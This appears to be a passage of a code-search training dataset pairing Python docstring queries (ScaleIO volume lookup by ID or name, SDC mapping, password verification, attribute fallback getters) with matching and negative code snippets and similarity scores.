self.detach():\n log.debug(\"Detached volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if ((self.static and (ServiceRole.GALAXY_DATA not in self.fs.svc_roles))\n or delete_vols):\n log.debug(\"Deleting volume {0} as part of {1} removal\".format(\n self.volume_id, self.fs.get_full_name()))\n self.delete()\n else:\n log.debug(\"Unmounted {0} but was instructed not to detach volume {1}\"\n .format(self.fs.get_full_name(), self.volume_id))" ]
[ "0.59390444", "0.5883608", "0.5831495", "0.5830611", "0.5827789", "0.5799781", "0.57569474", "0.57451755", "0.572967", "0.5713216", "0.570987", "0.570987", "0.570987", "0.570987", "0.5687949", "0.56447387", "0.5636559", "0.56025016", "0.55944437", "0.55915767", "0.55571306", "0.5547702", "0.5532852", "0.5522827", "0.55222267", "0.5518605", "0.55128074", "0.55004233", "0.5486687", "0.54715866" ]
0.681984
0
Get ScaleIO Volume object by its ID
def get_volume_by_id(self, id): for vol in self.conn.volumes: if vol.id == id: return vol raise KeyError("Volume with ID " + id + " not found")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_volume_from_id(item_id):\n return volumes[\"data\"][str(item_id)]", "def volume_get(context, volume_id):\n return _volume_get(context, volume_id)", "def find_volume(self, id: str) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def get_volume(self, volume_id):\n url = '%s/volumes/%s' % (self.catalog['volume'], volume_id)\n res = self.get(url)\n if res['status'] == 200:\n return json.loads(res['body'])['volume']\n else:\n LOG.error('Get volume failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)", "def _get_volumes_from_id(volume_id):\n\n volumes = _get_volumes(list_of_volume_ids=volume_id)\n\n return volumes[0] if volumes else volumes", "def get_volume(self, volume_id):\n aname = \"cinder_v%s.get_volume\" % self.version\n with atomic.ActionTimer(self, aname):\n return self._get_client().volumes.get(volume_id)", "def volume():\n vol = sonos.volume\n return vol", "def get_volume(self, volume):\n return self._get(_volume.Volume, volume)", "def get_volume_by_name(self, name):\n for vol in self.conn.volumes:\n if vol.name == name:\n return vol\n raise KeyError(\"Volume with NAME \" + name + \" not found\")", "def get_volume_from_name(item_name):\n item_id = get_id_from_name(item_name)\n return get_volume_from_id(item_id)", "def volume_id(self):\n if self.volume:\n return self.volume.id\n else:\n return None", "def volume_id(self):\n return self._volume_id", "def get_volume(self):\n return self.__volume", "def get_volume(self):\n return int(self.get(COMMAND_UIC, 'GetVolume')['volume'])", "def read_item(id: str, request: Request):\n obj = db.get(id, kind=endpoint_model)\n return obj", "def _create_volume(self):\n vol = {}\n vol['size'] = 1\n vol['availability_zone'] = 'test'\n return db.volume_create(self.context, vol)['id']", "def get_object(id):", "def get_volume(volume, array):\n try:\n return array.get_volume(volume, pending=True)\n except Exception:\n return None", "def get(resource_name, id, opts=None):\n opts = ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n return StorageClass(resource_name, opts)", "def lrs_volume(self, verbose = False):\n if is_package_installed('lrs') != True:\n print 'You must install the optional lrs package ' \\\n 'for this function to work'\n raise NotImplementedError\n\n in_str = self.cdd_Vrepresentation()\n in_str += 'volume'\n in_filename = tmp_filename()\n in_file = file(in_filename,'w')\n in_file.write(in_str)\n in_file.close()\n if verbose: print in_str\n\n lrs_procs = Popen(['lrs',in_filename],\n stdin = PIPE, stdout=PIPE, stderr=PIPE)\n ans, err = lrs_procs.communicate()\n if verbose: \n print ans\n # FIXME: check err\n\n for a_line in ans.splitlines():\n if 'Volume=' in a_line:\n volume = a_line.split('Volume=')[1]\n volume = RDF(QQ(volume))\n return volume\n\n raise ValueError, \"lrs did not return a volume\"", "async def get_volume(self, group_id: int) -> int:\n results = await self._api.call('group', 'get_volume', gid=group_id)\n return int(results.header.vars.get('level'))", "def volume(self):\n return self._volume()", "def volume(self):\n return self._volume()", "def get_object(self, id, **args):\n return self.request(\"{0}/{1}\".format(self.version, id), args)", "def get(self, cls, id):\n\n return FileStorage.__objects[key(cls, id)]", "def get_volume(self):\n return str(round(self._call_player_proxy('VolumeGet', None).unpack()[0]))", "def get_object(self, id_):\n return self._objects.get(id_, None)", "async def get_volume(self) -> int:\n return await self._pytheos.api.player.get_volume(self.id)", "def storage_get(context, storage_id):\n return _storage_get(context, storage_id)", "def get_voluuid(disk_object):\n return disk_object.get_image_id()" ]
[ "0.7770249", "0.76687425", "0.74675375", "0.7118734", "0.7027858", "0.6990481", "0.67697716", "0.6507782", "0.6490982", "0.6345176", "0.631454", "0.6314275", "0.616623", "0.6155505", "0.61281794", "0.61262006", "0.60813826", "0.6076707", "0.6064813", "0.60254", "0.5993264", "0.5948487", "0.5948487", "0.5939842", "0.5938867", "0.5895794", "0.58932674", "0.5889505", "0.586973", "0.5865907" ]
0.7940494
0
Get ScaleIO Volume object by its Name
def get_volume_by_name(self, name): for vol in self.conn.volumes: if vol.name == name: return vol raise KeyError("Volume with NAME " + name + " not found")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_volume_from_name(item_name):\n item_id = get_id_from_name(item_name)\n return get_volume_from_id(item_id)", "def volume():\n vol = sonos.volume\n return vol", "def get_volume(self, volume):\n return self._get(_volume.Volume, volume)", "def get_volumeslice( volume_name, slice_name ):\n try:\n vs = models.VolumeSlice.objects.get( volume_id__name = volume_name, slice_id__name = slice_name )\n return vs\n except Exception, e:\n logger.exception(e)\n logger.error(\"Failed to query datastore for volumes (mounted in %s)\" % (slice_name if (slice_name is not None or len(slice_name) > 0) else \"UNKNOWN\"))\n return None", "def get_volume_by_id(self, id):\n for vol in self.conn.volumes:\n if vol.id == id:\n return vol\n raise KeyError(\"Volume with ID \" + id + \" not found\")", "def get_volume_from_id(item_id):\n return volumes[\"data\"][str(item_id)]", "def volume_get(context, volume_id):\n return _volume_get(context, volume_id)", "def _create_snowshu_volume(self, volume_name: str) -> docker.models.volumes.Volume:\n try:\n volume = self.client.volumes.get(volume_name)\n except docker.errors.NotFound:\n volume = self.client.volumes.create(\n name=volume_name, driver='local',)\n return volume", "def get_volume(self):\n return self.__volume", "def get_volume(self):\n return str(round(self._call_player_proxy('VolumeGet', None).unpack()[0]))", "def get_volume(self):\n return int(self.get(COMMAND_UIC, 'GetVolume')['volume'])", "def get_volume(self, volume_id):\n url = '%s/volumes/%s' % (self.catalog['volume'], volume_id)\n res = self.get(url)\n if res['status'] == 200:\n return json.loads(res['body'])['volume']\n else:\n LOG.error('Get volume failed: %s %s %s' %\n (res['status'], res['reason'], res['body']))\n raise InvalidResponse(res)", "def get_volume(cls) -> float:\n raise NotImplementedError", "def Volume(self, default=None):\n return self.data.get('volume', default)", "def find_volume(self, id: str) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def get_volume(volume, array):\n try:\n return array.get_volume(volume, pending=True)\n except Exception:\n return None", "def volume(self):\n return self._volume()", "def volume(self):\n return self._volume()", "def lrs_volume(self, verbose = False):\n if is_package_installed('lrs') != True:\n print 'You must install the optional lrs package ' \\\n 'for this function to work'\n raise NotImplementedError\n\n in_str = self.cdd_Vrepresentation()\n in_str += 'volume'\n in_filename = tmp_filename()\n in_file = file(in_filename,'w')\n in_file.write(in_str)\n in_file.close()\n if verbose: print in_str\n\n lrs_procs = Popen(['lrs',in_filename],\n stdin = PIPE, stdout=PIPE, stderr=PIPE)\n ans, err = lrs_procs.communicate()\n if verbose: \n print ans\n # FIXME: check err\n\n for a_line in ans.splitlines():\n if 'Volume=' in a_line:\n volume = a_line.split('Volume=')[1]\n volume = RDF(QQ(volume))\n return volume\n\n raise ValueError, \"lrs did not return a volume\"", "def snapshot(self, name):\r\n return self.driver.create_volume_snapshot(volume=self, name=name)", "def load_volume(name, nx, ny, nz):\n\n # load raw volume into memory\n img = np.fromfile(name, dtype=np.float32)\n img = np.reshape(img, (ny, nx, nz))\n\n return img.transpose(0, 2, 1)", "def get_volume(self, volume_id):\n aname = \"cinder_v%s.get_volume\" % self.version\n with atomic.ActionTimer(self, aname):\n return self._get_client().volumes.get(volume_id)", "def volume(self):\n vol = None\n if self._mixer:\n vol = self._mixer.getvolume()\n return vol", "def getVolume(self):\n return self.__volume", "def create_volume(self, name: str, size: int) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def volume(self):\n return self.structure.volume", "def get_object(self, name):\n try:\n return self.data['objects'][normalize_object_name(name)]\n except KeyError:\n return None", "def get_basic_volume_info(vol_name, vl=None):\n return_dict = None\n try:\n vl, err = get_basic_volume_info_all()\n for v in vl:\n if v['name'] == vol_name:\n return_dict = v\n break\n except Exception, e:\n return None, 'Error getting basic volume information for a specific volume : %s' % str(e)\n else:\n return return_dict, None", "def fusion_api_get_storage_volumes(self, uri=None, param='', api=None, headers=None):\n return self.volume.get(uri=uri, api=api, headers=headers, param=param)", "def byvolume(cls, base, *parts, **kw):\n return cls(base, parts, by='volume', **kw)" ]
[ "0.75305146", "0.69920236", "0.6730676", "0.6723948", "0.6496563", "0.643003", "0.6369791", "0.6362524", "0.62434006", "0.62258524", "0.6180109", "0.608432", "0.60701185", "0.6064235", "0.605456", "0.60444987", "0.6015984", "0.6015984", "0.59529024", "0.59277195", "0.59163225", "0.5862787", "0.5861105", "0.58557796", "0.58487016", "0.58456093", "0.5831641", "0.5826388", "0.5825155", "0.5820187" ]
0.7781022
0
Get list of SDC mapped to a specific volume
def get_sdc_for_volume(self, volObj): sdcList = [] if volObj.mapped_sdcs is not None: for sdc in volObj.mapped_sdcs: sdcList.append(sdc) if len(sdcList) == 0: self.conn.logger.debug("No SDCs mapped to volume: %s-(%s)" % (volObj.name, volObj.id)) return [] # returning an empty list is # valid for snapshots or volumes. return sdcList
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_device_map():\n ret = []\n vlist = subprocess.check_output(['ceph-volume', 'lvm', 'list',\n '--format=json'])\n for osd_id, data in json.loads(vlist.decode('utf8')).items():\n osd_id = normalize_osd_id(osd_id)\n for elem in data:\n for device in elem['devices']:\n ret.append({'id': osd_id, 'path': device})\n return ret", "def get_volume_list():\n return parse_list_output(Popen('cinder list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])", "def get_volume(vol_dir):\n volume = []\n # Retrieve all the dicom filepaths\n files = get_filepaths(vol_dir)\n \n for slice_nr, dicom_path in enumerate(files):\n ds = pydicom.dcmread(dicom_path)\n img = ds.pixel_array\n \n if slice_nr == 0:\n # Get this on the first slice only\n spacing = ds.PixelSpacing\n spacing.append(ds.SliceThickness)\n spacing = np.asarray(spacing)\n \n # Note: In our case, sequence name contains venc and direction info\n sequence_name = ds.SequenceName\n # print(sequence_name)\n\n volume.append(img)\n volume = np.asarray(volume)\n return volume, spacing, sequence_name", "def show_asm_volumes(self):\n sql = \"select NAME from v$asm_diskgroup_stat ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#ASMVOLUME}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def getVolumesD(region):\n volumes = getVolumes(region)\n instances = getInstancesD(region)\n\n volumesDicts = []\n for v in volumesDicts:\n volumesDict = {\"id\": v.id,\n \"KEEP-tag\": getKeepTag(v),\n \"instance_KEEP-tag\": getKeepTag(getInstanceOf(v)),\n \"instance\": v.attach_data.instance_id,\n \"status\": v.status,\n \"size\": v.size,\n \"create-time\": v.create_time,\n \"region\": v.region.name,\n \"zone\": v.zone,\n \"snapshot_id\": v.snapshot_id,\n \"PROD\": isProduction(v)\n }", "def get_volumes():\n vols = []\n try:\n result = run_diskpart(['list volume'])\n except subprocess.CalledProcessError:\n pass\n else:\n # Append volume numbers\n output = result.stdout.decode().strip()\n for tmp in re.findall(r'Volume (\\d+)\\s+([A-Za-z]?)\\s+', output):\n vols.append({'Number': tmp[0], 'Letter': tmp[1]})\n\n return vols", "def get_ceph_disk():\n disks = []\n for srv in get_srv_list():\n cfg = get_srv_config(srv)\n for key in ['osd_data', 'osd_journal', 'mds_data', 'mon_data']:\n mnt_point = cfg[key]\n disk = get_disk_by_mountpoint(find_mount_point(mnt_point))\n if disk not in disks:\n disks.append(disk)\n return disks", "def get_volume_info(volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n volume_info_list = []\n for volume in volumes:\n command = 'cinder show %s' % volume['id']\n volume_info = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])\n att = volume_info['attachments'].replace(\"'\", \"\\\"\").replace(\n \"u\\\"\", \"\\\"\").replace(\" None,\", \" \\\"None\\\",\")\n volume_info['device'] = json.loads(att)[0]['device']\n volume_info_list.append(volume_info)\n return volume_info_list", "def volumes(self):", "def get_persistent_disks(k8s_ctx: str, dry_run: bool = False) -> List[str]:\n cmd = f'kubectl --context={k8s_ctx} get pv -o json'\n if dry_run:\n logging.info(cmd)\n else:\n p = safe_exec(cmd)\n if p.stdout:\n pds = json.loads(p.stdout.decode())\n return [i['spec']['csi']['volumeHandle'].split('/')[-1] for i in pds['items']]\n return list()", "def list_volumes(self, node=None):\n\n data = self._perform_get(self._get_disk_path(), Disks)\n volumes = [self._to_volume(volume=v, node=node) for v in data]\n return volumes", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def database_volume_get_list():\n db = database_get()\n\n session = db.session()\n query = session.query(model.Volume)\n\n volume_objs = list()\n for volume in query.all():\n nfvi_volume_data = json.loads(volume.nfvi_volume_data)\n nfvi_volume = nfvi.objects.v1.Volume(nfvi_volume_data['uuid'],\n nfvi_volume_data['name'],\n nfvi_volume_data['description'],\n nfvi_volume_data['avail_status'],\n nfvi_volume_data['action'],\n nfvi_volume_data['size_gb'],\n nfvi_volume_data['bootable'],\n nfvi_volume_data['encrypted'],\n nfvi_volume_data['image_uuid'])\n volume_obj = objects.Volume(nfvi_volume)\n volume_objs.append(volume_obj)\n return volume_objs", "def generate_osd_list(ceph_cluster: Ceph):\n client = ceph_cluster.get_ceph_object(\"installer\")\n ceph_osds = ceph_cluster.get_ceph_objects(\"osd\")\n osd_nodes = set()\n disk_list = set()\n for osd in ceph_osds:\n osd_nodes.add(osd.node.vmshortname)\n osd_node_list = list(osd_nodes)\n log.info(osd_node_list)\n for osn in osd_node_list:\n for osd in ceph_osds:\n if osd.node.vmshortname == osn:\n for i in osd.node.vm_node.volumes:\n disk_list.add(i)\n osd_disk_list = list(disk_list)\n log.info(osd_disk_list)\n log.info(len(osd_disk_list))\n dump_osd_data(client, osn, osd_disk_list)\n disk_list.clear()\n osd_disk_list.clear()", "def bootable_volume(volumes):\n for volume in volumes:\n if '/dev/vda' in volume['attachments']:\n return volume", "def collect_existing_mounts():\n result = {}\n for mount in sh.mount().stdout.decode('utf-8').splitlines():\n tokens = mount.split()\n if tokens[1] == 'on' and tokens[0].startswith('/dev/'):\n device = tokens[0][5:]\n result[tokens[2]] = device\n return result", "def _get_device_list(self):\n if self.app.config.cloud_type == 'ec2':\n # c5/m5 on AWS mounts EBS volumes as NVMe:\n # http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/nvme-ebs-volumes.html\n # http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/device_naming.html\n for itype in ['c5', 'm5']:\n if itype in self.app.cloud_interface.get_type():\n return frozenset(glob('/dev/nvme[0-26]n1'))\n return frozenset(glob('/dev/*d[a-z]'))", "def get_all_disk():\n\t\tdisks = []\n\t\tdisks_lines = linux.exe_shell(\"lsblk -o NAME,VENDOR|grep -P '^sd.*[A-Z]'\")\n\t\tfor line in disks_lines.splitlines():\n\t\t\tdisk_t = line.split()\n\t\t\tif len(disk_t) > 1 and \"LSI\" not in disk_t[1]:\n\t\t\t\tdisks.append(disk_t[0])\n\t\tds = []\n\t\tfor i in disks:\n\t\t\td_t = DiskFromLsiSas3(\"\", i)\n\t\t\td_t.fill_attrs()\n\t\t\tds.append(d_t)\n\t\treturn ds", "def get_all_disks():\n return DISKS_API.get(abs_link=False)", "def get_devices_lsscsi(self):\n\n try:\n message = \"Find SCSI Devices\"\n if self._include_enclosures:\n command = \"lsscsi --generic --transport | egrep 'disk|0x14|enclo'\"\n else:\n command = \"lsscsi --generic --transport | fgrep 'disk|0x14'\"\n pdata = self._run_command(command=command, message=message, logger=self._logger, shell=True)\n #\n # Format:\n # $ lsscsi --generic --transport\n # [0] [1] [2] [3] [4]\n # [0:0:0:0] disk sas:0x5000cca25103b471 /dev/sda /dev/sg0 \n # [0:0:1:0] disk sas:0x5000cca251029301 /dev/sdb /dev/sg1 \n # ...\n # [0:0:14:0] enclosu sas:0x5001636001caa0bd - /dev/sg14\n # [7:0:0:0] cd/dvd usb: 1-1.3:1.2 /dev/sr0 /dev/sg15\n #\n # Special Case:\n # Handle lines without a transport (spaces only). (screen scrapping danger)\n # [0:0:10:0] enclosu sas:0x50030480091d71fd - /dev/sg10\n # [1:0:0:0] disk <spaces> /dev/sdk /dev/sg11 <- INTEL disk!\n #\n # Another SNAFU! (and why I hate screen scrapping!!!)\n # [15:0:53597:0]disk sas:0x5000cca23b359649 /dev/sdg /dev/sg6 \n # [15:0:53598:0]disk sas:0x5000cca23b0c0a99 /dev/sdh /dev/sg7 \n # [15:0:53599:0]disk sas:0x5000cca23b0b7531 /dev/sdi /dev/sg8 \n # ...\n # [15:0:53686:0]enclosu sas:0x5000ccab040001bc - /dev/sg165\n # [15:0:53766:0]enclosu sas:0x5000ccab040001fc - /dev/sg144\n #\n # Evidently, the author of lsscsi did not think of consistent output! ;(\n #\n for line in pdata['stdout'].splitlines():\n dinfo = line.split()\n device = dict()\n if len(dinfo) < 5:\n m = re.search('(?P<device>disk|\\(0x14\\)|enclosu)', dinfo[0])\n if m:\n device['Device Type'] = m.group('device')\n sas_index = 1\n dev_index = 2\n sg_index = 3\n else:\n continue\n else:\n device['Device Type'] = dinfo[1]\n sas_index = 2\n dev_index = 3\n sg_index = 4\n\n # lsscsi does not understand 'Host Managed' device type.\n if '0x14' in device['Device Type']:\n device['Device Type'] = 'disk'\n\n # Parse remaining information.\n if 'sas:' in dinfo[sas_index]:\n device['SAS Address'] = dinfo[sas_index][4:]\n self._sas_addresses += 1\n else:\n device['SAS Address'] = \"\"\n\n # Note: Enclosure has no driver, so reports '-' for name.\n if '/dev/' in dinfo[dev_index]:\n if self._drives and not dinfo[dev_index] in self._drives:\n continue\n if self._exclude and dinfo[dev_index] in self._exclude:\n continue\n device['Linux Device Name'] = dinfo[dev_index]\n else:\n device['Linux Device Name'] = \"\"\n if '/dev/sg' in dinfo[sg_index]:\n device['SCSI Device Name'] = dinfo[sg_index]\n else:\n device['SCSI Device Name'] = \"\"\n\n self._devices.append(device)\n\n except RuntimeError as exc:\n self._logger.error(\"Failed to acquire SCSI devices: {0}\".format(exc))\n raise exc", "def mounts():\r\n ret = []\r\n with open('/proc/mounts') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n m = re.match(\r\n r'(?P<src>\\S+) (?P<dest>\\S+) (?P<type>\\S+)', line)\r\n if m:\r\n ret.append(m.groupdict())\r\n return ret", "def get_ceph_drv_info():\n disks_info = []\n stat = psutil.disk_io_counters(perdisk=True)\n for drv in get_ceph_disk():\n info = CEPHDiskInfo(drv)\n disk = basename(drv)\n if disk in stat:\n info.rd_cnt = stat[disk].read_count\n info.wr_cnt = stat[disk].write_count\n info.rd_bytes = stat[disk].read_bytes\n info.wr_bytes = stat[disk].write_bytes\n info.rd_time = stat[disk].read_time\n info.wr_time = stat[disk].write_time\n\n disks_info.append(info)\n\n return disks_info", "def device_mounted(uuid):\n out, err = run_cmd(['lsblk', '-o', 'NAME,UUID,MOUNTPOINT', '--json'])\n\n blockdevices = json.loads(out)['blockdevices']\n\n for blkdevice in blockdevices:\n if key_exists('children', blkdevice):\n for child in blkdevice['children']:\n if key_exists('mountpoint', child) and child['uuid'] == uuid:\n return child['mountpoint']", "def get_disks():\n\n if system() != \"Windows\":\n raise OSError(\"For use with Windows platforms.\")\n\n logicaldisks=run(\n [\"wmic\", \"logicaldisk\", \"get\", \"name\"],\n capture_output=True\n )\n\n return findall(\"[A-Z]:\", str(logicaldisks.stdout))", "def volume(self):\n return [node.volume for node in self]", "def mounts(self) -> list[str]:\n _args: list[Arg] = []\n _ctx = self._select(\"mounts\", _args)\n return _ctx.execute_sync(list[str])", "def list_volumes(self):\n\n print(self.format_string % (\"OpenStack Volume\", \"ScaleIO Name\", \"ScaleIO ID\", \"Attached\"))\n for os_volume in self.openstack.block_store.volumes(details=True,\n all_tenants=self.args.OS_ALL_TENANTS):\n sio_volume = self._convert_os_to_sio(os_volume.id)\n try:\n vol_id = self.scaleio.get_volumeid(sio_volume)\n if vol_id is not None:\n attached = 'True'\n if not os_volume.attachments:\n attached = 'False'\n print(self.format_string % (os_volume.id, sio_volume, vol_id, attached))\n except:\n # if we got here, there is no SIO volume for the openstack volume\n pass", "def get_persistent_volumes(k8s_ctx: str) -> List[str]:\n cmd = f'kubectl --context={k8s_ctx} get pv -o json'\n p = safe_exec(cmd)\n try:\n dvols = json.loads(p.stdout.decode())\n except Exception as err:\n raise RuntimeError('Error when parsing listing of Kubernetes persistent volumes ' + str(err))\n if dvols is None:\n raise RuntimeError('Result of kubectl pv listing could not be read properly')\n return [i['metadata']['name'] for i in dvols['items']]", "def volume():\n vol = sonos.volume\n return vol", "def get_vdcs(self):\n if self._check_for_7k():\n self.logger.debug('Getting VDC information from {}'.format(self.host))\n vdcxml = self._ncc.nxoscli('show vdc')\n vdcparsed = _begin_parse(vdcxml)\n vdcschema = parse_get_nsmap(vdcparsed)\n showvdc = parse_xml_heirarchy('ROW_vdc', ['vdc_id', 'vdc_name', 'state'], vdcschema,\n vdcparsed)\n vdcs = {}\n for v in showvdc:\n self.logger.debug(\n 'VDC {} {} {} on {}'.format(v['vdc_id'], v['vdc_name'], v['state'], self.host))\n vdcs[v['vdc_name']] = VDC(**v)\n if v['vdc_id'] == '1':\n self.default_vdc = v['vdc_name']\n self.vdcs = vdcs\n self.logger.debug(vdcs)" ]
[ "0.6761455", "0.6402484", "0.6302538", "0.625908", "0.62256217", "0.6195324", "0.6118881", "0.59791917", "0.595759", "0.59439385", "0.59184736", "0.584555", "0.581235", "0.5800224", "0.5754875", "0.57339233", "0.5706948", "0.5706084", "0.56977904", "0.56800914", "0.5660114", "0.56451297", "0.560772", "0.55752075", "0.55604374", "0.55377585", "0.54954857", "0.5469062", "0.54658854", "0.5461836" ]
0.7416448
0
Verifies the password and verify password matches.
def verify_match(password, verify): return password == verify
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def test_password_verification(self):\n self.user.password = '123456'\n self.assertTrue(self.user.verify_password('123456'))\n self.assertFalse(self.user.verify_password('password'))", "def verify_password(self, password):\n return pwd_context.verify(password, self.password)", "def verify_password(self, password):\n return self.PASS == password", "def verify_password(self, password):\n return self.PASSWORD == password", "def matches_password_verify(password, verify):\n if password and not password == verify:\n return \"Your passwords didn't match.\"\n else:\n return \"\"", "def verify_password(self, password):\n self.password_hash = generate_password_hash(password)\n\n return check_password_hash(self.password_hash, password)", "def verify_password(saved_password, password):\n return check_password_hash(saved_password, password)", "def verify_password(self, password):\n return Bcrypt().check_password_hash(self.password, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(self, password):\n return check_password_hash(self.password_hash, password)", "def verify_password(entered_password):\n return PASSWORD_RE.match(entered_password)", "def check_password(pw):\n if (pw == password):\n print('welcome password match')\n\n else:\n print('Wrong password')", "def verify_password(self, hash, password):\r\n try:\r\n PasswordHasher().verify(hash, password)\r\n return True\r\n except:\r\n return False", "def validate_password(self, password):\n return self._password == encrypt_password(password,\n b64decode(str(self._salt)))", "def verify_password(password, password_hash):\n\n password_entered = hash_password(password)\n return secrets.compare_digest(password_entered, password_hash)", "def test_check_password(self):\n user = User.query.filter_by(username='eschoppik').first()\n self.assertTrue(bcrypt.check_password_hash(user.password, 'secret'))\n self.assertFalse(bcrypt.check_password_hash(user.password, 'notsecret'))", "def password_is_correct(self, password):\n return Bcrypt().check_password_hash(self.password, password)", "def validate_password(self, password):\n return Bcrypt().check_password_hash(self.password, password)", "def check_password(self, password):\n return self.password == password", "def verify_password(self, password):\n user = self.get()\n if user:\n return bcrypt.verify(password, user['password'])\n return False", "def verify_password(self, password):\n stored_password = self.user_in_db['password']\n password_valid = passwords.verify_password(\n password, stored_password)\n\n if not password_valid:\n # Invalid password\n return {'error': 'Invalid email and password combination'}\n\n return {'success': True}", "def verify_pw(username, password):\n global password_store\n logger = logging.getLogger('verify_pw')\n if not password_store:\n logger.error(\"No password store specified\")\n return False\n logger.debug(\"Verifying password for %s\" % username)\n return password_store.verify(username, password)", "def verify_password(stored_passwd, provided_passwd):\n salt = stored_passwd[:64]\n stored_password = stored_passwd[64:]\n pwdhash = hashlib.pbkdf2_hmac(\n 'sha512', provided_passwd.encode('utf-8'), salt.encode('ascii'), 100000\n )\n pwdhash = binascii.hexlify(pwdhash).decode('ascii')\n return pwdhash == stored_password", "def check_password(self, password):\n\n if self.password is None:\n return False\n return check_password_hash(self.password, password)" ]
[ "0.8170263", "0.7866674", "0.7849448", "0.7771099", "0.7748505", "0.7726481", "0.77033484", "0.7687431", "0.7640428", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7635844", "0.7579744", "0.7566419", "0.74769354", "0.74679476", "0.74629104", "0.743957", "0.7417796", "0.7405744", "0.73882514", "0.7383286", "0.7357166", "0.7332444", "0.7316226", "0.7296673" ]
0.8035081
1
Fallback attribute getter. It enables to get access to the attribute and methods of the lowlevel Simulator directly, without having to do it through `simulator`.
def __getattr__(self, name: str) -> Any: return getattr(self.__getattribute__('simulator'), name)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __getattr__(self, attr): # or does it ?\n return self.X[attr]", "def __getattr__(self, name: str) -> Any:\n return self.__getattribute__(name)", "def __getattribute__(self, attr):\n if attr in ('make_rdm1s', 'spin_square', 'contract_2e',\n 'absorb_h1e'):\n raise AttributeError\n else:\n return object.__getattribute__(self, attr)", "def __getattribute__(self, attr):\n if attr in ('make_rdm1s', 'spin_square', 'contract_2e',\n 'absorb_h1e'):\n raise AttributeError\n else:\n return object.__getattribute__(self, attr)", "def __getattr__(self, attr):\n return self.get(attr)", "def __getattribute__(self, name):\n if name in [\"sampling_function\", \"env\", \"fit_dist\", \"reset\"]:\n return object.__getattribute__(self, name)\n\n else:\n return getattr(self.env, name)", "def _fget(self):\n # type: (...) -> Any\n try:\n return getattr(self, private_attr)\n except AttributeError:\n raise AttributeError(\n \"'{}' object has no attribute '{}'\".format(\n _get_type_name(type_), attr\n )\n )", "def __getattr__(self, attr):\n if attr in self._evtData_attrs:\n return getattr(self.evtData, attr)\n \n if attr in self._epicsLive_attrs:\n return getattr(self.epicsLive, attr)\n\n if attr in self._epicsStore_attrs:\n return getattr(self.epicsStore, attr)\n\n if attr in self.parameters:\n return self.parameters[attr]\n\n if attr in self._user_funcs:\n return self.get_function(attr)\n\n# if 'detectors' in self._det and attr in self._det['detectors']:\n if attr in self._detectors_attrs:\n return getattr(self._data, self._det['detectors'][attr])", "def __getattribute__(self, name):\n try:\n return self.gps.__getattribute__(name) \n except:\n return super().__getattribute__(name)", "def get_attr(self, key: str) -> Any:\n raise NotImplementedError(\"This method should be implemented by \"\n \"subclasses.\")", "def __getattr__(self, name):\n try:\n x = getattr(self.benchmarker, name)\n except AttributeError:\n print(\"AttributeError: {!s} not a member of FrameworkTest or Benchmarker\".format(name))\n print(\"This is probably a bug\")\n raise\n return x", "def __getattr__(self, name: str) -> Any:\n # We don't want to return anything for python copy / pickle methods.\n if name in _UNDEFINED_COPY_PICKLE_METHODS:\n raise AttributeError()\n self._try_setup()\n if name in self.__dict__:\n return self.__dict__[name]\n else:\n raise AttributeError(\n f'\"{self.__class__.__name__}\" object has no attribute \"{name}\"')", "def get_attr(self, name: str):\n return self.call(name)", "def __getattr__(self, name):\n if not name in self._attrs.iterkeys():\n raise AttributeError(name)\n return self._attrs[name]", "def __getattr__(self, attribute):\n if attribute.startswith('__'):\n raise AttributeError\n return getattr(self._http, attribute)", "def __getattr__(self, attr):\n return getattr(self.get_function(), attr)", "def __getattr__(self, name):\n if name in self:\n return self[name]\n raise AttributeError(_(\"Unknown attribute '%s'.\") % name)", "def get_attribute(self, attr):\n super().get_attribute(attr) # Keep this line, it triggers the parent class method.\n return getattr(self, attr)", "def __getattr__ (self, attr):\n try:\n return self.get_value (attr)\n except exc.x_not_found:\n try:\n return self.get_key (attr)\n except exc.x_not_found:\n raise AttributeError", "def __getattribute__(self,name):\n try:\n return object.__getattribute__(self,name)\n except AttributeError:\n extraPO = object.__getattribute__(self,'_extraPO')\n\n if hasattr(extraPO,name):\n return getattr(extraPO,name) # HIDDEN!\n\n _attr_err_msg = object.__getattribute__(self,'_attr_err_msg')\n\n raise AttributeError(_attr_err_msg(name,[self,extraPO]))", "def __getattr__(self, attribute):\n\t\tassert ltrace_func(TRACE_BASE)\n\n\t\ttry:\n\t\t\treturn dict.__getitem__(self, 